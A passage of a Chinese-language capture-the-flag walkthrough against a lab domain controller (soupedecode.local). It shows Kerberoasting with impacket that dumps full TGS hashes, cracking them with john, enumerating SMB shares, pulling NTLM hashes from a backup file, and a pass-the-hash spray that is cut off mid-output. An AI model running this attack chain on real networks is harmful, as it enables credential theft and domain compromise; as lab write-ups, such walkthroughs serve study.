\/><\/div><\/p>\n<p>\u7136\u540e\u66f4\u6362\u65b0\u5bc6\u7801\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-text\">ybob317317317\nYbob317317317<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257570.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257570.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816120158998\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u63a5\u7740\u505a\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo arp-scan -l -I eth1 | grep PCS\n[sudo] password for kali: \n192.168.10.106  08:00:27:80:24:7d       PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ IP=192.168.10.106                  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-16 00:05 EDT\nNmap scan report for 192.168.10.106\nHost is up (0.0015s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-16 19:06:00Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 23.26 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo ntpdate soupedecode.local\nntpdig: no eligible servers\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ tail -n 1 \/etc\/hosts               \n192.168.10.102          soupedecode.local\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo vim \/etc\/hosts           \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo ntpdate soupedecode.local\n2024-08-16 15:06:58.202273 (-0400) +53999.016483 +\/- 0.000783 soupedecode.local 192.168.10.106 s1 no-leap\nCLOCK: time stepped by 53999.016483\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:Ybob317317317&#039;\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation \n----------------------  --------------  --------  --------------------------  ---------  ----------\nFTP\/FileServer          file_svc                  2024-06-17 13:32:23.726085  &lt;never&gt;               \nFW\/ProxyServer          firewall_svc              2024-06-17 13:28:32.710125  &lt;never&gt;               \nHTTP\/BackupServer       backup_svc                2024-06-17 13:28:49.476511  &lt;never&gt;               \nHTTP\/WebServer          web_svc                   2024-06-17 13:29:04.569417  &lt;never&gt;               \nHTTPS\/MonitoringServer  monitoring_svc            2024-06-17 13:29:18.511871  &lt;never&gt; \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:Ybob317317317&#039; -request\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation \n----------------------  --------------  --------  --------------------------  ---------  ----------\nFTP\/FileServer          file_svc                  2024-06-17 13:32:23.726085  &lt;never&gt;               \nFW\/ProxyServer          firewall_svc              2024-06-17 13:28:32.710125  &lt;never&gt;               \nHTTP\/BackupServer       backup_svc                2024-06-17 13:28:49.476511  &lt;never&gt;               \nHTTP\/WebServer          web_svc                   2024-06-17 13:29:04.569417  &lt;never&gt;               \nHTTPS\/MonitoringServer  monitoring_svc            2024-06-17 13:29:18.511871  &lt;never&gt;               \n\n[-] CCache file is not found. Skipping...\n[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo rdate -n $IP           \nFri Aug 16 15:09:04 EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:Ybob317317317&#039; -request\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation \n----------------------  --------------  --------  --------------------------  ---------  ----------\nFTP\/FileServer          file_svc                  2024-06-17 13:32:23.726085  &lt;never&gt;               \nFW\/ProxyServer          firewall_svc              2024-06-17 13:28:32.710125  &lt;never&gt;               \nHTTP\/BackupServer       backup_svc                2024-06-17 13:28:49.476511  &lt;never&gt;               \nHTTP\/WebServer          web_svc                   2024-06-17 13:29:04.569417  &lt;never&gt;               \nHTTPS\/MonitoringServer  monitoring_svc            2024-06-17 13:29:18.511871  &lt;never&gt;               \n\n[-] CCache file is not found. Skipping...\n$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local\/file_svc*$c81ce3adafb236751d99d0f2de069816$f7d83c90969061e4e24e78f232dcdc9c76d752eff19241bb7e1b47781ce21f1d615fa24df8a20200d99fc094995b09becc90bd76a026c3fb043c8d86057ccc695f889c813abd7df854f9d252fdaf4e50754792de3269128bd7621cefe89200e78b2139669d5908ee896a90c425168251ea5eb9785e4096c2bb67897312c34476de2208da3659424a30b38b2c220c49f356eff0cdfb2ce4f79749f54f8d64758b4cbd5bba5830f4afb1830bf40d1d3d9445261780d107d1a378b27990a0dbf3892837737e10071598e6464b4fdc820f6f0dbbc8ee3d6b8cc8eb2a5717e19e3147ee0166a0f9e9a1d9d091cd926f3a9676f203a8bdae3cfd97b6be015931dd9a8d14d4c0b8139e408a5c98c7cf6d60c1d71575983e41b34cdc537c92e3b9551438b5b2e7463dd739435852228d8ae9a89af5bf8b0e296a9ae5af27338c9b7a4295440bb63514595b79539dd858f19fd232310f78957251ffd4f3c858b6ac53a58c1df0cb110674477f82b659c9f220b1b0fa2e8b01c56b2dcba5cd1ba61dfe218b789132bdc1fc0f1d1c466c7dd37789df7ca751f416bfafdce2678742a2f618a7bdf99755674f805c40bb753601709def6732a25936531e79bff9ced7240219cf53a3962e0d1f859a488836a7991f86263a414e593db1172e540e74c279d3d5aa4177fa5d15adab81af6c290d359ecd1afca4c6ebece0dbf000ab034ef522d9ee201de001181b9b4bb3d3696c81967a9cb4456b49d24772c3ba6b32bc19f7d3862fbc4b67d8755a8b6329b5a941694eb82331d68d19e4361958fab6f44208dd51c711c0191bfb00741b1f765952694b59b9b137638b59c2b065c89c350b1d3b65c91422fcb4b8d4c030f75a1465f78337a872d758268c5a386b6b76c206e11370fed14658fc624eccdccd56f6e28ce639152e275a3d0031dbb938e2e7f60959e87453eb64722db4e284ed3e6925810811391e41b6c7ee5b1ad0260b3627d01880a63737a923f221208e1f143f6d0a767a1fb461fca5b2467bca9a5909774b0759c67e44e04eddfde6b2471e1da2d0d4f16d945456ed5e171c206ade3f77efb6d5818fcf0ed09d5957588f4b94243d8445d6308c4b41d607890a578d2d612758d298a915e31cea18e987b9c4e939331b54e6cc1305ea3f3313b132da0d73dd3456e293c961763307ff6269737c988ff5df35bc5dbeabd97ab7eada45fdf257229b00419851874c599949662d8dd97c23f7766c5dabe168036b181a88b2f933939e1ed7577a311683e0cca69003e0cd4c3c7e332119ffd0b0075f6ebc65ebda10f669f8ab810e3aebc15e37a78eeaab4d77a9e4d85e855ca9c8beb4d0a65ce7b748c93a97a388a85edddcc601c736187e05cb130ddef3ffa7ec27f7b1cb82b882bdf2d2baa2c8fdbb869c9d9d687ab5746181a85c0694283b902635cffaa3c573718ef1340777fb46446df09ce649397b14e9544e7aba29e5923afa95040269268631\n$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$soupedecode.local\/firewall_svc*$f4c7c2ec54d1f194563376179174baaa$a78a95b5641c8730142c652df295bdd3b4a3ad20b9adf589a64ce85fd13b85f516a2bdc7e0769609af5af472e2675d2d01be5fd6a4308ac0fa13edd54502b1d7cf0499fb00ad6ff8ce425f0fc524d6287bb34f5ce8f8e03bfa9bd767e5aca8bee065d613ca1bef9b48c52fda28f029d08371f3f706553a09f47282c0128fe5c8ac1ea6f1b4fc02d51c760633a89f58f1f075a8aa8cefa1f3b7ff38bec511cf114763d0bc6bfebbbd58c299400b5f506f5c05318573a52e1eb20d306f530675b958be5c9105060d6907adec6254dee5c227524d1a5ea62db4afd73d6a4f9c33b03cf3f2e8c177bcc938a3dd887efb00d4bd5f91fcfe27ab1264af5e484d4a51ebf9a3e4322ebd2c242c8d57b9c51094fa2bf90f26bb82a5eb2881944105735145129d0f1838a9da2c055fe0cb0d9b41abd78856521970ec5d831a1f02274b08609e232c4cd372dd7f6cf708b98d450458b1473a21776fec8f370b061a0d303887c5d4fad04353bfa5ecafdf91e73269acf5d36fdaf5034a9fd9d7291ecdc5b34112df2c9c8519a3628bc6f6abe1f52bbd09bfd450eb69089699742fb1473fa56eb36a9d305faac7b1da3eeeea7ad06829526535b82eda2c4ca94bdcd99887e51af24d53c101f3a41052ee6894e349f321b8b007e94f08cc37cf4a1f39ca27ff7cf143a93bcc7d8eb919e952b16d41bcd1df9709eab4414c02eb9d0cabdac501697c2130e53b1054b9ce7164d8cf76dae4910c82caece522a36ee68c70f883b65c1121e6cc8c9a33482555ebc6027f1450d0b115b5335cb9e73f9ecc1aab2b9661540ab566fc5bcd22d527ea068ec67566cc5f614ef7298753312724c5bbc80803b3fdc1afb1d9fedbd4900f75e7c997b53c401e4943aec392796da653fedf1b5bb4fd84529f13586b169966979048a9e61e5894a20e6840f28250de44556b22098409cb4acc2955a49a5540c2032cf9ff037da380607525daebcf28a03694aa98a37f1161d0024265b4bb0b09e29cab1b7cbc22064c9628150adb69ee74c99ec776aa7ef31809f56519abc1ae995d11b5cf3ce68b035f30d88e30609e0b4b17eaa337ecc5cc2266c06dd3e9b74b87df9f5e309280eabd4b116b43a0f6c38ca15a1f5890c5f764da705452d368a916b86c6bfd18a187c449d84d67ef49a6184ea85fc6c9a43a6f2556b3ddbec110ae925f11f3cae8433e657661d42414dbafad9afa002c26c45044351e6fa67807bf9df10d544d6dc66b7d9a0a6e74cdbc930f24ede3da81cfd89c84ace95ad350ddd08c18f29d30e32c922ec954e44a0756ee4bd0066ce188d7e4f9a87d9635902ec222a8954911d84865daa19f370f22afff2ab0f119057a0d48cce85e0e4d1a884fb698490d59acdf009644173577f87fc916c4ba88e9996b19f9131d767f839d3bd6405a15e1562a7b1d941137141de2058b6bb48a8d3d9ac01ae784fbbd595633f794a9c9844202704761b082211af6e12403\n$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$soupedecode.local\/backup_svc*$496e923b5e34674592aaada0fb125ec7$714610d11f57946fe1a1cc2ce948c2cd1db585b8b22a6012ffe5cb8877fae5f9921e24d35b1f1b8098d36711a59433b531794cc6e75420899b9e4e17b22d6610c60e5f496ad9dece08c6d54f12d91cf5e07af4eaf64665ec1405ce97540e9fc66befe6060b6d6c446db6d6a85bc45dec03770e246be346823ee48163e96a40d119c200b4ff479f337736e286e322d62d5688d259cae2342ecc63a17241ccaea0746e28e31e790aeb540842c4a66ca53fdeeeda166ddbc8328f62278105fc86c1014e09d3be70888628040b073164829ee509d84e1ea1a1d8041b9d2b151c47d09975ab9a1aed87d5a2e0293fa12181f9d302c5dcebc0ffd348d3b5cfd66188f5a49d91fff40d1b2a5fcf24cd6ec8d60b63f1cff753de564fb326d001677da96b24a79f6e0fe63d6ada6de7ff75ba55f2c7e04949d8c9761234739f71b9c11cffb5348c6771bc1ea6877cedcfccb629b4290b574c9cf885da31f60921523e1661381add1b5415953803a07c274e2f6218458190d82240c07a38024329133a62f8083c2f64fa01346e2f4bf8bafe36e1c10efb68d3af91a0d33b34170ce8fcdea774cb9f7f4d5e963edaba36c0acccf5970542d0ed4c6260c4ca456dc3440fb562961601591f70d0dcf7a28979d115db95a43d5c3d5768eac32432a4f3ab9446c967c654fd4b4c992dc2b5d87e2ba5d0230b70f761b76e96247a942de7fa58ee5467a1d705bec220c468b7c6795904713bcfb53964d133cbc91e2f3e1aba0661c5046f398f6dafd5996bb2e03db09e1760f13eccf2b386fc0828042198edc5534ee387b872e325ace12dc167bdd19db68de632bc7e7992f9601d0a0d445185ba859840e52e2bd84811df42a9e83bf1bb8b214a08d48b2a0670f95b8cb1ca3358269b8d7b4c49bcbf3645a7d702f877717f86f6ffa03d1d0bd77c1bd8a66a246ef2b498e447b9cfb7685d24ea968f773d5fd0954a40ce9879d7b75f42fcd1dc374c2775d3f24c72225804089c0c443859d23db4cfbdabb6fd6b733477ec0e366b325e9947e8a890b13bae55cddfc058642879a9e5789121081db31fe5b2ba08b7db9b6b0ae9139fd90a32fd137ac631ff708217c3c8f7932a1c66306a844162212c7728323d408f918a5b78852b7603d93d7ef4c4c14e115b170e20b1f00f79591bd3d8f5f322daa47f293853af1460ff5c29a75db035b521c135021ba79c438eb33abeda9b904c230b16996968972832eca73117397ec0ad96631a6da6f29c485f9fe33bb394137787ec265646ae5d723ab9e863986dd43599e74a5b847a76759b34d09bdfcc9b123faa75033ae7b45dbd2af32fb3cf628d31fca2f4d335080ddbfa2649c480f8f50da8f6cb9f23224772b1817eda93516d20e9a566359e68ce25af89c01dd211b4e71552a2586c693b92fbb7ca905392dc43bae82a1e5ac1b0d767efeb1d786cc870e25188dd586af7126f65ebe5c95474ab1c4979285153dfb020\n$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$soupedecode.local\/web_svc*$969bf48d7346bb1eb51825341ca43ad2$58e9bec68260a352da6bbb6b48af5d0e0df0e6133fa2cf44844fb0d7668000d3fe9b0e40bef6ddb9f13acb14b5907932c892a9634ce92abca074dd8afa408b6dc9c9a44d18ecd54a5dc9a69da41d3d490b51bd6ab54a910e71744bb2d09228640b2a11007e872658fb418f76e88db70eb8778cb09dda6a53783b0d1345b98ade162c0c5106bf957d004aed4482926aa2b4ca2fa036f1e1cbafa23b0508d3a5bcce87fca36d3dc39e00c480dff20b61d768a89f83d2a6c1b036b9780327255907ea050506057b3b972a3072a66553fd15c54a760f095a7b2e18442d9f11f29fad6e174d10535df8107f2c82179f04bd9151b9f02747757bccedd69485c4da6b9bc981addf2287b7b91cb469e4314ada6466ceb035c23c87d77197f66c7a7d7fa11dc1edaadca2c1a58550d2ef4f4361c1b8d7372303bdab9d7d80cf6688b7f90d3c94f874fb095c1c93f9912329cbefebcc782f6564b7ffd6ce702acdf4051a83025ea2b8469188b28c5863299568c3942f4f81ff0ebac7e3c26f159f2b798f4eead3cdf7f47bb012002164b788565fdcfa7d675b88fd0b13cfbaa2f9edd105c9693f2345eec4cf7a1075a465ae12dbfad9d727eec81e8c390decaf18f9e648bc44bcc8763c8fc09dfa31bca7899202d71d445480ba04d0a2e6f11404a75a5e1d8003616efda965cbbbb7f53ef4003accfe0f74ac974ee41673db6961dd3510dfb77ef2e1682af106df318a1e14ee0575278e0dd55fa04a0442840e9a179d64b9e6e5002696a370f2c17bd28512fe15bc0d52bf8e449ecc3145ed1c36d9efee66dee9f2f0b50bb78110fa96599d70105165cd1d4678b5349028941c137cd4100ddf5b6a59434aa16cbe5ef2703100b348b73b8a8a5db2338f5ea75eba1d226a729af3e4705d8fc5bda6278699e0f6f7f853aabf47ad6cc63019375de2d2a21d5e0560b2aebd43270b624c8f87a4c0e58b303f53a3427690cc4e780dc1beaaa1ccc2ecfa523ce8e40cce117fbd9c7aa764554c3a7b030f820ab803aae30722b244109a6607a187a0683e8da9b6c6377312cb6ef720f64aceccda16d9365192883b90de86235dfbb176d17358b3bb359efa4538578f6531dcf08f26dec7977a419278a97bef6b0c9f3f383bfce1876739e414b16a4a688e86d459976747f519fb06cf9230ceafb34351ebe3f996b2ff77f3c0d34aba8bfa8f26ac65e514c87dc280c63c2232ab3ee099314444ab1852a60e4a1749756ef13203ed8437b69a28fe58e9eb98f8343450fb273a27a5c150091eb96f56eea7658b069e0ced9db3e0f3df37431878e7c6a3daa787f4b0c70d4ddeea7098581225f291cb7f470e198d2cafed22d3d62ba3487a526b9118946e6c3d4881ecac17e7f45620cb64a40fb3508c43c6eba0912a7973d2072057b02e0d573525bc3a1f7254404f2740286009b529e020f3358db55c8e1c24b2c50dd67b3ad3fb435b9896d4af1a95c99ee2f5900853\n$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$soupedecode.local\/monitoring_svc*$a21eca5ab03c1524e2eb41b46b1be2af$bc91db3e8b643f665ee187b0374dff228f33012092b69e59c3c82c891e28f798673f44369da3627f8324f6ec20c822f780443f23cd181eb7f631aa15f246728315ce97546546fbc75f3a3141ac91c8c97b18f2b821862add0963ad83bd275ebe5a67349342a1724932dd17abd28d527c9b284b8ac44b790e293bcacbb98efe41ac01b2add10c6e92845cd6605c7632af83bfade8c6b55bd5b903262704d0d45995f1c5dd32b8507acbec93d135642a22701c9b9c50ef2f82acea5e610c324f321d4c8d698e6b0ae01cd3df60211f7a5ecc9a09c428ca499cb829defd90ef89fe392256dbad9aa28a49eaf1eec3cb84fa3576591ccde4ccbc3b2cc37bfcfebe7929fa641eaf0dddfdf7d3cb7f5de7ebab2b6d3a0aa407ffbeadf25bcab91ed5c11304e5445a63ec8096a7a1af7299b3565dcb72fc06d083d86b525098591f2d9f9cea80bcde51a6de0076d81fbe493e8b301d60ff8ad51a96f2e378efdbdd0ed077a9d7b8d5ac88614e0ced136c0828e81cc07cbab3193b66f00d7bc98bf29821fd57d8b73b4f72ad95dc854baed77a712fd07d0f32ee06aa2a6cdd8f6c97a6bc975ed744c48bdb636581a3b2b5a7ea180007acbae098c6e483a90f98c54e03c7581027bbb27aceb99e7d0668137bb1367554b58e35c109ce3d6049974e9f48f4650fedb74bfdda3199c59b73f8e9d47a88d656312a9437bfaf74d4057418d7d12d37253aa71cb4d1f81182fe9ed1e35015d39fb338c1e5d01ba9f035f302ec6653f8f935a16b80cdc168272c19329e69f0ff91525ac78c75b4e942f678e821dfd55980c74d9ba7b9d89b834878bf3ae16b8884cf087ddd15b4ab98a2a5a5bd782800b2b3cc5ee1c001b1d1df9b6333c4c81815853766b995c87ca6fcce2907d532ea9828a00b59d16de632166ed7ddd13bbcd5ed271524d4f4580fce00c42a6771cdcbed9773ae0e51111dcaee2e08a519c967647d8a987eda97f70b03b972eec5e7ae7c5e031ee71a0026fe3fb298eb646a75aeb7ebde95352c66a7119417918ce8f924cfc23ea205e7274acd7bee1162b99e4a2ca02655dfe010596b6823dfb6e5de26d12921b79f02eb5d67c21424028d833a3cc3c4ba57204ce9258c8dcb040d18972d7271ddf79310e9699d27c93e4db90b33eff4645bde67fc8d915bd8174a1897ec243c0e966effcb0d82931bbfeabfb3fc158490b3f82ff9f7051c5718c0bd998e19be067ec3bee73968a89e0844b6d34becda72085f0234f04a42ad79a93224db654dcf28c4163230602ff7aafd88e136ebbdde42f9feca06319d5cb2a68e4cc670d1e79714fe7a8023fad11cbc2464581092f905c52c6502b70b432123d94c6ecceb10dcf40f3781ba7e72687ff7cba5de46e50c47e7d119a18417206545af0f6f06a1d62b85d9b78614c9f53b919d638939c2da36c0cded9226cb703555aa9ea0f6b06f71e031459cbfd31e875cb24ca790a2dfc9395d5b04bdb30f<\/code><\/pre>\n<h3>hash\u78b0\u649e<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo rdate -n $IP                                                                        \nFri Aug 16 15:12:03 EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:Ybob317317317&#039; -request &gt; hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash                                    \nUsing default input encoding: UTF-8\nLoaded 5 password hashes with 5 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nPassword123!!    (?)     \n1g 0:00:00:38 DONE (2024-08-16 00:13) 0.02597g\/s 372565p\/s 1769Kc\/s 1769KC\/s  0841079575..*7\u00a1Vamos!\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<h3>smb\u641c\u96c6\u4fe1\u606f<\/h3>\n<p>\u4e0d\u77e5\u9053\u7528\u6237\u540d\u662f\u54ea\u4e2a\uff0c\u6328\u4e2a\u8bd5\u4e00\u4e0b\uff0c\u53d1\u73b0\u90fd\u4e0d\u884c\uff0c\u770b\u4e86wp\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nxc smb $IP -u file_svc -p &#039;Password123!!&#039;\nSMB         192.168.10.106  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\file_svc:Password123!! STATUS_PASSWORD_EXPIRED <\/code><\/pre>\n<p>\u9776\u673a\u53c8\u4e0d\u542c\u8bdd\u4e86\u3002\u3002\u3002\u3002\u3002\u4fee\u6539\u5bc6\u7801\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-text\">Password123!!!<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nxc smb $IP -u file_svc -p &#039;Password123!!!&#039; \nSMB         192.168.10.106  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.106  445    DC01             [+] SOUPEDECODE.LOCAL\\file_svc:Password123!!! \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nxc smb $IP -u file_svc -p &#039;Password123!!!&#039; --shares\nSMB         192.168.10.106  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.106  445    DC01             [+] SOUPEDECODE.LOCAL\\file_svc:Password123!!! \nSMB         192.168.10.106  445    DC01             [*] Enumerated shares\nSMB         192.168.10.106  445    DC01             Share           Permissions     Remark\nSMB         192.168.10.106  445    DC01             -----           -----------     ------\nSMB         192.168.10.106  445    DC01             ADMIN$                          Remote Admin\nSMB         192.168.10.106  445    DC01             backup          READ            \nSMB         192.168.10.106  445    DC01             C$                              Default share\nSMB         192.168.10.106  445    DC01             IPC$            READ            Remote IPC\nSMB         192.168.10.106  445    DC01             NETLOGON        READ            Logon server share \nSMB         192.168.10.106  445    DC01             SYSVOL          READ            Logon server share \nSMB         192.168.10.106  445    DC01             Users                           \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/$IP\/backup -U file_svc                  \nPassword for [WORKGROUP\\file_svc]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Mon Jun 17 13:41:17 2024\n  ..                                 DR        0  Mon Jun 17 13:44:56 2024\n  backup_extract.txt                  A      892  Mon Jun 17 04:41:05 2024\n\n                12942591 blocks of size 4096. 10810869 blocks available\nsmb: \\&gt; get backup_extract.txt \ngetting file \\backup_extract.txt of size 892 as backup_extract.txt (14.8 KiloBytes\/sec) (average 14.8 KiloBytes\/sec)\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ cat backup_extract.txt \nWebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::\nDatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::\nCitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::\nFileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::\nMailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::\nBackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::\nApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::\nPrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::\nProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::\nMonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ awk -F &#039;[:]&#039; &#039;{print $1}&#039; backup_extract.txt\nWebServer$\nDatabaseServer$\nCitrixServer$\nFileServer$\nMailServer$\nBackupServer$\nApplicationServer$\nPrintServer$\nProxyServer$\nMonitoringServer$\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ awk -F &#039;[:]&#039; &#039;{print $4}&#039; backup_extract.txt\nc47b45f5d4df5a494bd19f13e14f7902\n406b424c7b483a42458bf6f545c936f7\n48fc7eca9af236d7849273990f6c5117\ne41da7e79a4c76dbd9cf79d1cb325559\n46a4655f18def136b3bfab7b0b4e70e3\n46a4655f18def136b3bfab7b0b4e70e3\n8cd90ac6cba6dde9d8038b068c17e9f5\nb8a38c432ac59ed00b2a373f4f050d28\n4e3f0bb3e5b6e3e662611b1a87988881\n48fc7eca9af236d7849273990f6c5117\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ hash-identifier                                                    \n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: 48fc7eca9af236d7849273990f6c5117\n\nPossible Hashs:\n[+] MD5\n[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nxc smb $IP -u user -H hash_pass \nSMB         192.168.10.106  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\DatabaseServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\CitrixServer$:c47b45f5d4df5a494bd19f13e14f7902 